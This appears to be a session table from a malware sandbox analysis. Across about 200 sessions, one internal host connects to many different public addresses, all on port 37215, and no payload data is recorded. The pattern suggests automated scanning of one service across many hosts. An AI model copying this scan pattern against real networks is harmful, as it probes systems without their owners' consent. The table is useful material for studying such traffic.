                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24790192.168.2.1556012156.47.50.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24791192.168.2.1541406156.102.22.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24792192.168.2.1556006156.167.143.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24793192.168.2.1555138156.197.177.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24794192.168.2.1543818156.171.52.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24795192.168.2.1557150156.87.159.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24796192.168.2.1547060156.37.127.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24797192.168.2.1557318156.193.84.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24798192.168.2.1537866156.44.214.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24799192.168.2.1545684156.110.78.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24800192.168.2.1554242156.114.187.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24801192.168.2.1539208156.25.195.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24802192.168.2.1534836156.190.41.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24803192.168.2.1532936156.128.57.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24804192.168.2.1557060156.19.15.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24805192.168.2.1536718156.107.38.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24806192.168.2.1557836156.29.77.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24807192.168.2.1554438156.86.131.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24808192.168.2.1554696156.197.26.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24809192.168.2.1553634156.162.57.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24810192.168.2.1533750156.188.54.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24811192.168.2.1537546156.36.122.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24812192.168.2.1544992156.108.158.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24813192.168.2.1550044156.114.57.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24814192.168.2.1557696156.84.12.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24815192.168.2.1544312156.120.3.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24816192.168.2.1559578156.53.164.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24817192.168.2.1545204156.29.158.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24818192.168.2.1558662156.64.121.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24819192.168.2.1545674156.116.89.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24820192.168.2.1538932156.78.12.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24821192.168.2.1558126156.55.205.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24822192.168.2.1548534156.46.113.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24823192.168.2.1544866156.32.58.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24824192.168.2.1539564156.46.169.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24825192.168.2.1541076156.234.69.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24826192.168.2.1554354156.45.137.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24827192.168.2.1549118156.53.20.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24828192.168.2.1540608156.9.30.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24829192.168.2.1542658156.192.119.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24830192.168.2.1556944156.10.250.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24831192.168.2.1546638156.151.236.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24832192.168.2.1557304156.243.52.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24833192.168.2.1557210156.12.247.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24834192.168.2.1544272156.3.190.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24835192.168.2.1543338156.79.226.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24836192.168.2.1533592156.48.57.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24837192.168.2.1553998156.24.102.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24838192.168.2.1555304156.169.196.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24839192.168.2.1543064156.9.139.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24840192.168.2.1541546156.255.22.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24841192.168.2.1534548156.173.106.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24842192.168.2.1534374156.90.176.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24843192.168.2.1540642156.119.187.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24844192.168.2.1545894156.221.106.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24845192.168.2.1547946156.65.45.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24846192.168.2.1550174156.52.181.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24847192.168.2.1560218156.80.159.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24848192.168.2.1560474156.174.104.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24849192.168.2.1550364156.59.135.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24850192.168.2.1550732156.166.234.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24851192.168.2.1540248156.52.243.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24852192.168.2.1541338156.168.56.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24853192.168.2.1552462156.52.248.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24854192.168.2.1549494156.7.6.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24855192.168.2.1535088156.92.14.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24856192.168.2.1539384156.92.156.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24857192.168.2.1545038156.217.27.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24858192.168.2.1547166156.145.200.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24859192.168.2.1540272156.109.193.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24860192.168.2.1559990156.40.113.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24861192.168.2.1543862156.104.160.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24862192.168.2.1552276156.124.99.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24863192.168.2.1543766156.26.250.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24864192.168.2.1545658156.244.219.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24865192.168.2.1537354156.233.50.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24866192.168.2.1551984156.44.182.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24867192.168.2.1551960156.85.222.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24868192.168.2.1532994156.166.175.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24869192.168.2.1545134156.112.26.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24870192.168.2.1534130156.188.25.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24871192.168.2.1548686156.167.222.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24872192.168.2.1537218156.203.201.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24873192.168.2.1549616197.22.46.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24874192.168.2.1560338156.28.218.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24875192.168.2.1549608197.87.132.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24876192.168.2.1545868197.87.139.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24877192.168.2.1543738197.37.81.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24878192.168.2.1552354197.151.71.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24879192.168.2.1540964197.210.130.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24880192.168.2.1535504197.207.92.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24881192.168.2.1557236197.95.102.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24882192.168.2.1544394197.238.35.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24883192.168.2.1539174197.82.160.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24884192.168.2.1552152197.230.79.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24885192.168.2.1560670197.193.204.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24886192.168.2.1534704197.113.224.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24887192.168.2.1557452197.13.60.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24888192.168.2.1550072197.102.136.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24889192.168.2.1537064197.217.166.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24890192.168.2.1560556197.237.36.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24891192.168.2.1548462197.117.204.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24892192.168.2.1553554197.46.55.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24893192.168.2.1535086197.37.247.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24894192.168.2.1550322197.60.101.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24895192.168.2.1552452197.113.123.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24896192.168.2.1557362197.76.138.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24897192.168.2.1533592197.209.226.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24898192.168.2.1542680197.167.53.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24899192.168.2.1537374197.139.86.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24900192.168.2.1557098197.226.121.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24901192.168.2.1544250197.247.34.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24902192.168.2.1533586197.141.99.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24903192.168.2.1555240197.221.121.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24904192.168.2.1549050197.21.148.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24905192.168.2.1550634197.44.93.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24906192.168.2.1546010197.85.176.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24907192.168.2.1535106197.8.151.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24908192.168.2.1544854197.135.214.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24909192.168.2.1559528197.237.164.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24910192.168.2.1559396197.198.164.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24911192.168.2.1538576197.42.239.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24912192.168.2.1548880197.26.111.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24913192.168.2.1543320197.196.174.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24914192.168.2.1543868197.167.137.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24915192.168.2.1547616197.4.238.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24916192.168.2.1537288197.44.17.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24917192.168.2.1538096197.55.255.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24918192.168.2.1543008197.103.68.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24919192.168.2.1548862197.93.178.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24920192.168.2.1548594197.225.213.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24921192.168.2.1545110197.218.62.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24922192.168.2.1548662197.29.54.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24923192.168.2.1545000197.254.230.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24924192.168.2.1536118197.150.98.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24925192.168.2.1533672197.226.227.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24926192.168.2.1534618197.10.180.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24927192.168.2.1540244197.148.134.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24928192.168.2.1542814197.170.254.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24929192.168.2.1537040197.166.178.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24930192.168.2.1547094197.12.108.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24931192.168.2.1551356197.220.124.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24932192.168.2.1540640197.113.194.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24933192.168.2.1553784197.69.93.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24934192.168.2.1550800197.14.133.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24935192.168.2.1545732197.52.240.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24936192.168.2.1542724197.7.188.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24937192.168.2.1532850197.139.135.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24938192.168.2.1558196197.246.38.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24939192.168.2.1553924197.194.215.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24940192.168.2.1548862197.202.74.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24941192.168.2.1551616197.144.57.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24942192.168.2.1551898197.138.181.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24943192.168.2.1541528197.156.250.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24944192.168.2.1550850197.140.14.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24945192.168.2.1558462197.204.108.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24946192.168.2.1550836197.135.68.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24947192.168.2.1547940197.210.85.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24948192.168.2.1533182197.140.234.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24949192.168.2.1543270197.235.223.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24950192.168.2.1539266197.163.151.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24951192.168.2.1550340197.38.114.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24952192.168.2.1545140197.208.96.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24953192.168.2.1560274197.41.130.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24954192.168.2.1556750197.194.91.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24955192.168.2.1540176197.231.65.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24956192.168.2.1552604197.8.14.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24957192.168.2.1540692197.207.177.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24958192.168.2.1534790197.158.76.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24959192.168.2.1547642197.197.111.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24960192.168.2.1548990197.202.20.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24961192.168.2.1542720197.201.148.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24962192.168.2.1554024197.117.218.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24963192.168.2.1546076197.154.74.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24964192.168.2.1540146197.60.178.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24965192.168.2.1558550197.129.167.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24966192.168.2.1553724197.0.161.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24967192.168.2.1536050197.73.201.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24968192.168.2.1544676197.31.221.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24969192.168.2.1537128197.80.78.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24970192.168.2.1551442197.142.223.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24971192.168.2.1538816197.100.91.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24972192.168.2.1551108197.146.239.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24973192.168.2.1550220197.17.232.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24974192.168.2.1534998197.200.95.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24975192.168.2.1558236197.152.116.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24976192.168.2.1548040197.65.48.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24977192.168.2.1544058197.122.116.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24978192.168.2.1539576197.69.194.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24979192.168.2.1554584197.169.40.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24980192.168.2.1557330197.235.84.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24981192.168.2.1539210197.188.83.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24982192.168.2.1543866197.234.16.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24983192.168.2.1546790197.239.60.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24984192.168.2.1558946197.231.198.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24985192.168.2.1539016197.175.98.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24986192.168.2.1558622197.70.104.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24987192.168.2.1535304197.38.238.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24988192.168.2.1544022197.89.40.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24989192.168.2.1552242197.82.202.14537215
                                                                            TimestampBytes transferredDirectionData


